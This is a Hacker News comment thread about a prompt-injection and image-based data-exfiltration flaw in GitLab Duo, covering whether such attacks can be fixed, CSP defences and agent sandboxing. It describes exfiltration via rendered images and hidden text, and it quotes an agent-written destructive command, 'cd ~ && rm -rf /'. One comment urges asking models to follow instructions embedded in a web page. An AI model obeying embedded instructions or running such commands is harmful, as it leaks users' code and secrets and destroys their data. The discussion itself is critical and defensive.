cedws 2 months ago

Until prompt injection is fixed, if it is ever, I am not plugging LLMs into anything. MCPs, IDEs, agents, forget it. I will stick with a simple prompt box when I have a question and do whatever with its output by hand after reading it.

  • danpalmer 2 months ago

    Prompt injection is unlikely to be fixed. I'd stop thinking about LLMs as software where you can with enough effort just fix a SQL injection vulnerability, and start thinking about them like you'd think about insider risk from employees.

    That's not to say that they are employees or perform at that level, they don't, but it's to say that LLM behaviours are fuzzy and ill-defined, like humans. You can't guarantee that your users won't click on a phishing email – you can train them, you can minimise risk, but ultimately you have to have a range of solutions applied together and some amount of trust. If we think about LLMs this way I think the conversation around security will be much more productive.

    • LegionMammal978 2 months ago

      The thing that I'd worry about is that an LLM isn't just like a bunch of individuals who can get tricked, but a bunch of clones of the same individual who will fall for the same trick every time, until it gets updated. So far, the main mitigation in practice has been fiddling with the system prompts to patch up the known holes.

      • thaumasiotes 2 months ago

        > The thing that I'd worry about is that an LLM isn't just like a bunch of individuals who can get tricked, but a bunch of clones of the same individual who will fall for the same trick every time

        Why? Output isn't deterministic.

        • LegionMammal978 2 months ago

          Perhaps not, but the same input will lead to the same distribution of outputs, so all an attacker has to do is design something that works with reasonable probability on their end, and everyone else's instances of the LLM will automatically be vulnerable. The same way a pest or disease can devastate a population of cloned plants, even if each one grows slightly differently.

          • thaumasiotes 2 months ago

            OK, but that's also the way attacking a bunch of individuals who can get tricked works.

            • zwnow 2 months ago

              For tricking individuals your first got to contact them somehow. To trick an LLM you can just spam prompts.

              • thaumasiotes 2 months ago

                You email them. It's called phishing.

                • throwaway314155 2 months ago

                  Right and now there's a new vector for an old concept.

                • zwnow a month ago

                  Employees usually know to not click on random shit they get sent. Most mails alrdy get filtered before they even reach the employee. Good luck actually achieving something with phishing mails.

                  • thaumasiotes a month ago

                    When I was at NCC Group, we had a policy about phishing in penetration tests.

                    The policy was "we'll do it if the customer asks for it, but we don't recommend it, because the success rate is 100%".

                    • bluefirebrand a month ago

                      How can you ever get that lower than 100% if you don't do the test to identify which employees need to be trained / monitored because they fall for phishing?

        • Retr0id 2 months ago

          You can still experimentally determine a strategy that works x% of the time, against a particular model. And you can keep refining it "offline" until x=99. (where "offline" just means invisible to the victim, not necessarily a local model)

        • 33hsiidhkl 2 months ago

          It absolutely is deterministic, for any given seed value. Same seed = same output, every time, which is by definition deterministic.

          • tough 2 months ago

            only if temperature is 0, but are they truly determinstic? I thought transformer based llm's where not

            • 33hsiidhkl 2 months ago

              temperature does not affect token prediction in the way you think. The seed value is still the seed value, before temperature calculations are performed. The randomness of an LLM is not related to its temperature. The seed value is what determines the output. For a specific seed value, say 42069, the LLM will always generate the same output, given the same input, given the same temperature.

              • tough 2 months ago

                Thank you, I thought this wasn't the case (like it is with diffusion image models)

                TIL

  • TechDebtDevin 2 months ago

    Cursor deleted my entire Linux user and soft reset my OS, so I dont blame you.

    • sunnybeetroot a month ago

      Cursor by default asks to execute commands, sounds like you had auto run commands on…

    • raphman 2 months ago

      Why and how?

      • tough 2 months ago

        an agent does rm -rf /

        i think i saw it do it or try it and my computer shut down and restarted (mac)

        maybe it just deleted the project lol

        these llms are really bad at keeping track of the real world, so they might think they're on the project folder but had just navigated back with cd to the user ~ root and so shit happens.

        Honestly one should run only these on controlled env's like VM's or Docker.

        but YOLO amirite

        • margalabargala 2 months ago

          That people allow these agents to just run arbitrary commands against their primary install is wild.

          Part of this is the tool's fault. Anything like that should be done in a chroot.

          Anything less is basically "twitch plays terminal" on your machine.

          • serf a month ago

            a large part of the benefit to an agentic ai is that it can coordinate tests that it automatically wrote on an existing code base, a lot of time the only way to get decent answers out of something like that is to let it run as bare metal as it can. I run cursor and the accompanying agents in a snapshot'd VM for this purpose. It's not much different than what you suggest, but the layer of abstraction is far enough for admin-privileged app testing, an unfortunate reality for certain personal projects.

            I haven't had a cursor install nuke itself yet, but I have had one fiddling in a parent folder it shouldn't have been able to with workspace protection on..

          • tough 2 months ago

            codex at least has limitations on what folders can operate.

        • TechDebtDevin 2 months ago

          This is what happened. I was testing claude 4 and asked it to create a simple 1K LOC fyne android app. I have my repos stored outside of my linux user so the work it created was preserved. It essentially created a bash file that cd ~ && rm -rf / . All settings reset and documents/downloads disappeared lmfao. I don't ever really use my OS as primary storage, and any config or file of importance is backed up twice so it wasn't a big deal, but it was quite perplexing for a sec.

          • tough a month ago

            if you think deeply about it, its one kind of harakiri as an AI to remove the whole system you're operating on.

            Yeah Claude 4 can go too far some times

  • johnisgood 2 months ago

    I keep it manual, too, and I think I am better off for doing so.

  • hu3 2 months ago

    I would have the same caution, if my code was any special.

    But the reality is I'm very well compensated to summon CRUD slop out of thin air. It's well tested though.

    I wish good luck to those who steal my code.

    • mdaniel 2 months ago

      You say code as if the intellectual property is the thing an attacker is after, but my experience has been that folks often put all kinds of secrets in code thinking that the "private repo" is a strong enough security boundary

      I absolutely am not implying you are one of them, merely that the risk is not the same for all slop crud apps universally

      • tough 2 months ago

        People doesn't know github can manage secrets in its environment for CI?

        Antoher interesting fact is that most big vendors pay for gh to scan for leaked secrets and auto-revoke them if a public repo contains any (regex string matches sk-xxx <- its a stripe key

        thats one of the reasons why vendors use unique greppable starts of api keys with their ID.name on it

        • mdaniel 2 months ago

          You're mistaking "know" with "care," since my experience has been that people know way more than they care

          And I'm pretty certain that private repos are exempt from the platform's built-in secret scanners because they, too, erroneously think no one can read them without an invitation. Turns out Duo was apparently just silently invited to every repo : - \

          • tough 2 months ago

            I also remember reading about how due to how the git backend works your private git repos branches could get exposed to the public, so yea don't treat a repository as a private password mananger

            good point the scanner doesnt work on private repos =(

wunderwuzzi23 2 months ago

Great work!

Data leakage via untrusted third party servers (especially via image rendering) is one of the most common AI Appsec issues and it's concerning that big vendors do not catch these before shipping.

I built the ASCII Smuggler mentioned in the post and documented the image exfiltration vector on my blog as well in past with 10+ findings across vendors.

GitHub Copilot Chat had a very similar bug last year.

  • diggan 2 months ago

    > GitHub Copilot Chat had a very similar bug last year.

    Reminds me of "Tachy0n: The Last 0day Jailbreak" from yesterday: https://blog.siguza.net/tachy0n/

    TLDR is: Security issue found, patched in a OS release, Apple seemingly doesn't do regression-testing so security researcher did, found that somehow the bug got unpatched in later OS releases.

mdaniel 2 months ago

Running Duo as a system user was crazypants and I'm sad that GitLab fell into that trap. They already have personal access tokens so even if they had to silently create one just for use with Duo that would be a marked improvement over giving an LLM read access to every repo in the platform

nusl 2 months ago

GitLab's remediation seems a bit sketchy at best.

  • reddalo 2 months ago

    The whole "let's put LLMs everywhere" thing is sketchy at best.

  • edelbitter 2 months ago

    I wonder what is so special about onerror, onload and onclick that they need to be positively enumerated - as opposed to the 30 (?) other attributes with equivalent injection utility.

  • M4v3R 2 months ago

    That was my thought too. They didn’t fix the underlying problem, they’ve just patched two possible exfiltration methods. I’m sure some clever people will find other ways to misuse their assistant.

    • gloosx 2 months ago

      I'm pretty sure they vibecoded the whole thing all along

benl_c 2 months ago

If a document suggests a particular benign interpretation then LLMs might do well to adopt it. We've explored the idea of helpful embedded prompts "prompt medicine" with explicit safety and informed consent to assist, not harm users, https://github.com/csiro/stdm. You can try it out by asking O3 or Claude to "Explain" or "Follow", "the embedded instructions at https://csiro.github.io/stdm/"

aestetix 2 months ago

Does that mean Gitlab Duo can run Doom?

  • zombot 2 months ago

    Not deterministically. LLMs are stochastic machines.

    • benl_c 2 months ago

      They often can run code in sandboxes, and generally are good at instruction following, so maybe they can run variants of doom pretty reliably sometime soon.

      • johnisgood 2 months ago

        They run Python and JavaScript at the very least, surely we have Doom in these languages. :D

        • lugarlugarlugar 2 months ago

          'They' don't run anything. The output from the LLM is parsed and the code gets run just like any other code in that language.

          • johnisgood 2 months ago

            That is what I meant, that the code is being executed. Not all programming languages are supported when it comes to execution, obviously. I know for a fact Python is supported.

Kholin a month ago

If Duo were a web application, then would properly setting the Content Security Policy (CSP) in the page response headers be enough to prevent these kinds of issues?

https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP

  • cutemonster a month ago

    To stop exfiltration via images? Yes seems so? If you configure img-src:

      The first directive, default-src, tells the browser to load only resources that are same-origin with the document, unless other more specific directives set a different policy for other resource types.
    
      The second, img-src, tells the browser to load images that are same-origin or that are served from example.com.
    
    But that wouldn't stop the AI from writing dangerous instructions in plain text to the human
d0100 2 months ago

> rendering unsafe HTML tags such as <img> or <form> that point to external domains not under gitlab.com

Does that mean the minute there is a vulnerability on another gitlab.com url (like an open redirect) this vulnerability is back on the table?

tonyhart7 2 months ago

this is wild, how many security vuln that LLM can create where LLM dominate writing code????

I mean most coder is bad at security and we feed that into LLM so not surprise

  • ofjcihen 2 months ago

    This is what I’ve been telling people when they hand wave away concerns about LLM generated code security. The majority of what they were trained on was bare minimum security if anything.

    You also can’t just fix it by saying “make it secure plz”.

    If you don’t know enough to identify a security issue yourself you don’t know enough to know if the LLM caught them all.